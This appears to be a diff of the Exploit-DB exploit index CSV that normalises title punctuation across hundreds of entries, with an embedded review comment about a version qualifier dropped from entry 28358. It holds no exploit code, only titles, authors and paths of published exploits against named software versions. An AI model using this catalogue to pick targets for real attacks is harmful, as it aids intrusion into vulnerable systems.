 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0
 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0
 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,Metasploit,java,remote,0
@@ -17591,8 +17591,8 @@ id,file,description,date,author,platform,type,port
 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS",2000-10-03,"BindView's Razor Team",windows,dos,0
 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x fstat Format String",2000-10-04,K2,openbsd,local,0
 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0
-20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0
-20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0
+20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0
+20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0
 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0
 20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0
 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0
@@ -17798,7 +17798,7 @@ id,file,description,date,author,platform,type,port
 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure",2000-12-05,"china nsl",multiple,remote,0
 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Remote Arbitrary Command Execution",2000-12-06,"Secure Reality Advisories",unix,remote,0
 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL DoS",2000-12-05,benjurry,windows,dos,0
-21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0
+21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0
 20472,platforms/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,multiple,remote,0
 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x_Catalyst 5000 4.5/5.x_Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0
 20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0
@@ -18135,9 +18135,9 @@ id,file,description,date,author,platform,type,port
 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0
 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
 20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name DoS",2001-05-07,neme-dhc,windows,dos,0
-20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
-20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
-20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
+20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
+20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
+20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos,0
 20835,platforms/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote,0
 20836,platforms/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote,0
@@ -19180,7 +19180,7 @@ id,file,description,date,author,platform,type,port
 21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure",2002-10-07,frog,php,webapps,0
 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0
 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0
-21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
+21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta ",windows,dos,0
 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection",2002-10-08,hish,php,webapps,0
 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse",2002-10-08,netmask,unix,remote,0
@@ -19302,7 +19302,7 @@ id,file,description,date,author,platform,type,port
 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,"cr4wl3r ",php,webapps,0
 22039,platforms/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0
 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0
-22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0
+22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0
 22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0
 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 Script Injection",2002-11-25,"Pete Foster",php,webapps,0
 22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Include",2002-11-25,frog,php,webapps,0
@@ -20119,7 +20119,7 @@ id,file,description,date,author,platform,type,port
 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,php,webapps,0
 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0
 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0
-23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0
+23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0
 23035,platforms/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps,0
 23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0
 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0
@@ -20467,7 +20467,7 @@ id,file,description,date,author,platform,type,port
 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0
 23240,platforms/windows/dos/23240.pl,"mIRC 6.1 DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0
 23241,platforms/windows/dos/23241.pl,"mIRC 6.1 DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0
-23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
+23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0
@@ -21332,7 +21332,7 @@ id,file,description,date,author,platform,type,port
 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Local Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
 24142,platforms/windows/dos/24142.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0
-24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0
+24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0
 24144,platforms/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",windows,dos,0
 24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos,0
 24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos,0
@@ -24107,7 +24107,7 @@ id,file,description,date,author,platform,type,port
 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0
-26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products SQL Injection",2005-12-30,DevilBox,asp,webapps,0
+26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0
 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0
 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0
 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0
@@ -24565,7 +24565,7 @@ id,file,description,date,author,platform,type,port
 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0
 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0
-27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0
+27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0
 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0
 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0
@@ -25306,7 +25306,7 @@ id,file,description,date,author,platform,type,port
 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0
 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0
 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise index.php d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
-28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
+28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Include",2006-07-20,AG-Spider,php,webapps,0
 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0
 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Include",2006-07-21,Solpot,php,webapps,0
@@ -25389,7 +25389,7 @@ id,file,description,date,author,platform,type,port
 28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152
 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443
 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,Metasploit,windows,local,0
-28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443
+28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443
 28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443
 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900
 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0
@@ -25411,7 +25411,7 @@ id,file,description,date,author,platform,type,port
 28355,platforms/php/webapps/28355.txt,"VWar 1.5 news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
 28356,platforms/php/webapps/28356.txt,"VWar 1.5 stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0
-28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0
+28358,platforms/linux/dos/28358.txt,"Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0
 28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 Index.php Remote File Include",2006-08-07,sh3ll,php,webapps,0
 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0
 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0
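Review bot: The rewritten description for entry 28358 drops the `2.6.x` qualifier, so `Linux Kernel <= 2.6.17.7` now reads as an upper bound over all kernel series rather than the 2.6 branch the original named, which widens the stated affected range while only a separator was intended. Keeping the series and the bound together, `"Linux Kernel 2.6.x <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service"`, preserves the original scope in the new `Product - Title` style. Entries 29290 and 29316 (the `Apache + PHP 5.x` rows later in this diff) lose their `5.x` qualifier the same way, though there both bounds already sit inside the 5.x series so the meaning is unchanged.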
@@ -25475,7 +25475,7 @@ id,file,description,date,author,platform,type,port
 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0
 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Include",2006-08-22,Root3r_H3ll,php,webapps,0
-28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
+28424,platforms/linux/remote/28424.txt,"Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0
 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0
 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0
@@ -25635,7 +25635,7 @@ id,file,description,date,author,platform,type,port
 28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 modules/search.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0
 28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 modules/register Multiple Parameter SQL Injection",2006-09-15,"HACKERS PAL",php,webapps,0
 28587,platforms/asp/webapps/28587.txt,"EasyPage 7 Default.ASPX SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0
-28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0
+28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products - SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0
 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0
 28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 REP_CLASS Multiple Remote File Include Vulnerabilities",2006-09-16,ERNE,php,webapps,0
 28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection",2006-09-16,"HACKERS PAL",php,webapps,0
@@ -25695,7 +25695,7 @@ id,file,description,date,author,platform,type,port
 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0
 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0
 28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0
-28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0
+28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0
 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0
 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - (.wav) Crash PoC",2013-09-30,xboz,windows,dos,0
 28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
@@ -26294,7 +26294,7 @@ id,file,description,date,author,platform,type,port
 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0
 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0
 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Include",2006-12-16,Kacper,php,webapps,0
-29290,platforms/php/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80
+29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80
 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0
 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0
 29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0
@@ -26318,7 +26318,7 @@ id,file,description,date,author,platform,type,port
 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0
 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0
 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0
-29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
+29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
 29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0
@@ -26539,7 +26539,7 @@ id,file,description,date,author,platform,type,port
 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0
 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos,0
 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0
-30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0
+30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0
 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0
 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",linux,dos,0
 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0
@@ -26910,7 +26910,7 @@ id,file,description,date,author,platform,type,port
 29807,platforms/php/remote/29807.php,"PHP <= 5.1.6 Imap_Mail_Compose() Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0
 29808,platforms/php/remote/29808.php,"PHP <= 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0
 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 Assert() Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos,0
-29810,platforms/windows/dos/29810.c,"Symantec Multiple Products SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0
+29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0
 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0
 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 LPEXT.DLL Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0
 29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443
@@ -26966,9 +26966,9 @@ id,file,description,date,author,platform,type,port
 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0
 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0
 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Include",2007-04-19,"HACKERS PAL",php,webapps,0
-29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
-29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
-29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
+29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
+29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
+29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
